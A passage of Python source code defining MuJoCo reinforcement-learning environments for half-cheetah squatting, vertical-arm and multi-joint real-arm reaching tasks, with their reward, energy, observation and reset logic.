velocity = self.sim.data.qvel.flat.copy()
body_orientation=self.sim.data.geom_xmat[1][6:9].flat.copy()
#distance=list(self.get_body_com("torso")[2] - self.target_pos[2] )
distance = [self.get_body_com("torso")[2] - self.target_pos[2]]
if self._exclude_current_positions_from_observation:
position = position[1:]
#observation = np.concatenate((position, velocity)).ravel()
if self._horizontal_weight != 0:
observation = np.concatenate(
(position, velocity,body_orientation, distance)).ravel()
else:
observation = np.concatenate(
(position, velocity, distance)).ravel()
return observation
def reset_model(self):
self.timestep=0
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = np.asarray([self.get_body_com("torso")[0], self.get_body_com("torso")[1], self.target_low])
observation = self._get_obs()
return observation
def viewer_setup(self):
'''for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)'''
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 1.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0.5 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0.5
self.viewer.cam.lookat[2] += 0
self.viewer.cam.elevation = 0 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
class HalfCheetahSquat4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofsquat.xml',
distance_weigth=5.0,
health_weight=1,
horizontal_weight=0.1, ##
ctrl_cost_weight=0.,
reset_noise_scale=0.1,
healthy_z_range=(0.2, 1),
terminate_when_unhealthy=False, ##
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
if terminate_when_unhealthy:
healthy_reward=1.0
else:
healthy_reward=0
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._healthy_reward = healthy_reward
self._health_weight=health_weight
self._distance_weigth = distance_weigth
self._horizontal_weight=horizontal_weight
self._terminate_when_unhealthy = terminate_when_unhealthy
self._healthy_z_range = healthy_z_range
self.target_low=0.25
self.target_high=0.7#0.6
self.joint_list=['bthigh','bshin','fthigh','fshin']
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.target_pos = np.asarray([0, 0, 0])
self.target_site=0
self.flipstep=75
self.timestep=0
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
@property
def is_healthy(self):
# state = self.state_vector()
#state = self.get_body_com("torso")
state=self.sim.data.get_geom_xpos('head')
min_z, max_z = self._healthy_z_range
is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)
return is_healthy
@property
def healthy_reward(self):
return float(
self.is_healthy
or self._terminate_when_unhealthy
) * self._healthy_reward
@property
def done(self):
done = (not self.is_healthy
if self._terminate_when_unhealthy
else False)
return done
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
#x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
self.timestep += 1
#x_position_after = self.sim.data.qpos[0]
#x_velocity = ((x_position_after - x_position_before)
# / self.dt)
ctrl_cost = np.sum(np.square(action))#self.control_cost(action)
healthy_reward = self.healthy_reward
vec = self.get_body_com("torso")[2] - self.target_pos[2]
reward_dist = np.linalg.norm(vec)
horizontal_penalty=np.abs(sum([0, 0, 1] - self.sim.data.geom_xmat[1][6:9]))
#print(horizontal_penalty)
#forward_reward = x_velocity#self._forward_reward_weight *
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
#reward = forward_reward - ctrl_cost
ori_reward = - self._distance_weigth * reward_dist \
- self._ctrl_cost_weight * ctrl_cost \
- self._horizontal_weight * horizontal_penalty \
+ self._health_weight * healthy_reward
done = self.done
if self.timestep % self.flipstep == 0 and self.timestep != 0: # 2
if self.target_pos[2] <= self.target_low:
self.target_pos[2] = self.target_high
elif self.target_pos[2] >= self.target_high:
self.target_pos[2] = self.target_low
self.target_pos[0] = self.get_body_com("torso")[0]
self.target_pos[1] = self.get_body_com("torso")[1]
self.sim.data.site_xpos[self.target_site]= self.target_pos
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
# energy = energy + np.abs(action[i]) * delta_theta
energy = energy + np.sum(np.square(delta_theta))
if not self._terminate_when_unhealthy:
unhealty_penalty = -5
if not self.is_healthy:
ori_reward += unhealty_penalty
final_reward =ori_reward- self.energy_weights*energy
observation = self._get_obs()
info = {
'energy' : energy,
'reward_dist': -reward_dist,
'reward_ctrl': -ctrl_cost,
'horizontal_penalty': -horizontal_penalty,
'reward_survive': healthy_reward,
'ori_reward': ori_reward,
}
return observation, final_reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
body_orientation=self.sim.data.geom_xmat[1][6:9].flat.copy()
#distance=list(self.get_body_com("torso")[2] - self.target_pos[2] )
distance = [self.get_body_com("torso")[2] - self.target_pos[2]]
if self._exclude_current_positions_from_observation:
position = position[1:]
#observation = np.concatenate((position, velocity)).ravel()
if self._horizontal_weight != 0:
observation = np.concatenate(
(position, velocity,body_orientation, distance)).ravel()
else:
observation = np.concatenate(
(position, velocity, distance)).ravel()
return observation
def reset_model(self):
self.timestep=0
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = np.asarray([self.get_body_com("torso")[0], self.get_body_com("torso")[1], self.target_low])
observation = self._get_obs()
return observation
def viewer_setup(self):
'''for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)'''
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 1.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0.5 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0.5
self.viewer.cam.lookat[2] += 0
self.viewer.cam.elevation = 0 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
class HalfCheetahSquat6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_squat.xml',
distance_weigth=5.0,
health_weight=1,
horizontal_weight=0.1, ##
ctrl_cost_weight=0.,
reset_noise_scale=0.1,
healthy_z_range=(0.2, 1),
terminate_when_unhealthy=False, ##
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
if terminate_when_unhealthy:
healthy_reward=1.0
else:
healthy_reward=0
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._healthy_reward = healthy_reward
self._health_weight=health_weight
self._distance_weigth = distance_weigth
self._horizontal_weight=horizontal_weight
self._terminate_when_unhealthy = terminate_when_unhealthy
self._healthy_z_range = healthy_z_range
self.target_low=0.25
self.target_high=0.7#0.65
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.target_pos = np.asarray([0, 0, 0])
self.target_site=0
self.flipstep=75
self.timestep=0
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
@property
def is_healthy(self):
# state = self.state_vector()
# state = self.get_body_com("torso")
state = self.sim.data.get_geom_xpos('head')
min_z, max_z = self._healthy_z_range
is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)
return is_healthy
@property
def healthy_reward(self):
return float(
self.is_healthy
or self._terminate_when_unhealthy
) * self._healthy_reward
@property
def done(self):
done = (not self.is_healthy
if self._terminate_when_unhealthy
else False)
return done
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
#x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
self.timestep += 1
#x_position_after = self.sim.data.qpos[0]
#x_velocity = ((x_position_after - x_position_before)
# / self.dt)
ctrl_cost = np.sum(np.square(action))#self.control_cost(action)
healthy_reward = self.healthy_reward
vec = self.get_body_com("torso")[2] - self.target_pos[2]
reward_dist = np.linalg.norm(vec)
horizontal_penalty=np.abs(sum([0, 0, 1] - self.sim.data.geom_xmat[1][6:9]))
#forward_reward = x_velocity#self._forward_reward_weight *
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
#reward = forward_reward - ctrl_cost
ori_reward = - self._distance_weigth * reward_dist \
- self._ctrl_cost_weight * ctrl_cost \
- self._horizontal_weight * horizontal_penalty \
+ self._health_weight * healthy_reward
done = self.done
if self.timestep % self.flipstep == 0 and self.timestep != 0: # 2
if self.target_pos[2] <= self.target_low:
self.target_pos[2] = self.target_high
elif self.target_pos[2] >= self.target_high:
self.target_pos[2] = self.target_low
self.target_pos[0] = self.get_body_com("torso")[0]
self.target_pos[1] = self.get_body_com("torso")[1]
self.sim.data.site_xpos[self.target_site]= self.target_pos
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
# energy = energy + np.abs(action[i]) * delta_theta
energy = energy + np.sum(np.square(delta_theta))
if not self._terminate_when_unhealthy:
unhealty_penalty = -5
if not self.is_healthy:
ori_reward += unhealty_penalty
final_reward =ori_reward- self.energy_weights*energy
observation = self._get_obs()
info = {
'energy' : energy,
'reward_dist': -reward_dist,
'reward_ctrl': -ctrl_cost,
'horizontal_penalty': -horizontal_penalty,
'reward_survive': healthy_reward,
'ori_reward': ori_reward,
}
return observation, final_reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
body_orientation=self.sim.data.geom_xmat[1][6:9].flat.copy()
#distance=list(self.get_body_com("torso")[2] - self.target_pos[2] )
distance = [self.get_body_com("torso")[2] - self.target_pos[2]]
if self._exclude_current_positions_from_observation:
position = position[1:]
#observation = np.concatenate((position, velocity)).ravel()
if self._horizontal_weight != 0:
observation = np.concatenate(
(position, velocity,body_orientation, distance)).ravel()
else:
observation = np.concatenate(
(position, velocity, distance)).ravel()
return observation
def reset_model(self):
self.timestep=0
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = np.asarray([self.get_body_com("torso")[0], self.get_body_com("torso")[1], self.target_low])
observation = self._get_obs()
return observation
def viewer_setup(self):
'''for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)'''
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 1.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0.5 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0.5
self.viewer.cam.lookat[2] += 0
self.viewer.cam.elevation = 0 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
```
#### File: gym/mujoco/vertical_arm.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
DEFAULT_CAMERA_CONFIG = {
'trackbodyid': 0,
'distance': 1.0,
'lookat': np.array((0.0, 0.0, 0)),
'elevation': 0,
}
def sin(t,omega=1.5,phi=0.):#1
return np.sin(omega*t+phi)
def cos(t,omega=1.5,phi=0.):#1
return np.cos(omega*t+phi)
class VA(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder', 'elbow']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl = - np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:2]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[2:],
self.sim.data.qvel.flat[:2],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm4dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:4]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[4:],
self.sim.data.qvel.flat[:4],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm6dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:6]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[6:],
self.sim.data.qvel.flat[:6],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA8dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm8dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'shoulder3','shoulder4','elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:8]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[8:],
self.sim.data.qvel.flat[:8],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
# pcx=0.05#0.05#0.32#-0.6
# pcy=0#0.32#-0.2 #-0.2
class RealArm7dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm7dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction','s_flexion', 's_rotation','e_flexion','e_pronation', 'w_abduction','w_flexion']
self.pcx=pcx
self.pcy=pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight=distance_reward_weight
self.shoulder_cost_weight=shoulder_cost_weight
self.wrist_cost_weight=wrist_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
reward_wristrot = - np.square(total_torque[4::]).sum()
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
+ self.wrist_cost_weight*reward_wristrot
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_wrist': self.wrist_cost_weight * reward_wristrot,
'ori_reward': reward
}
return ob, reward, done,info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:7]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[7:],
self.sim.data.qvel.flat[:7],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm6dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction','s_flexion', 's_rotation','e_flexion', 'w_abduction','w_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight=distance_reward_weight
self.shoulder_cost_weight=shoulder_cost_weight
self.wrist_cost_weight=wrist_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
reward_wristrot = - np.square(total_torque[4::]).sum()
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
+ self.wrist_cost_weight*reward_wristrot
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
#self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [(p1x - p2x) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1x + p2x) / 2, 0,(p1y - p2y) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1y + p2y) / 2] # ,phi=1
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
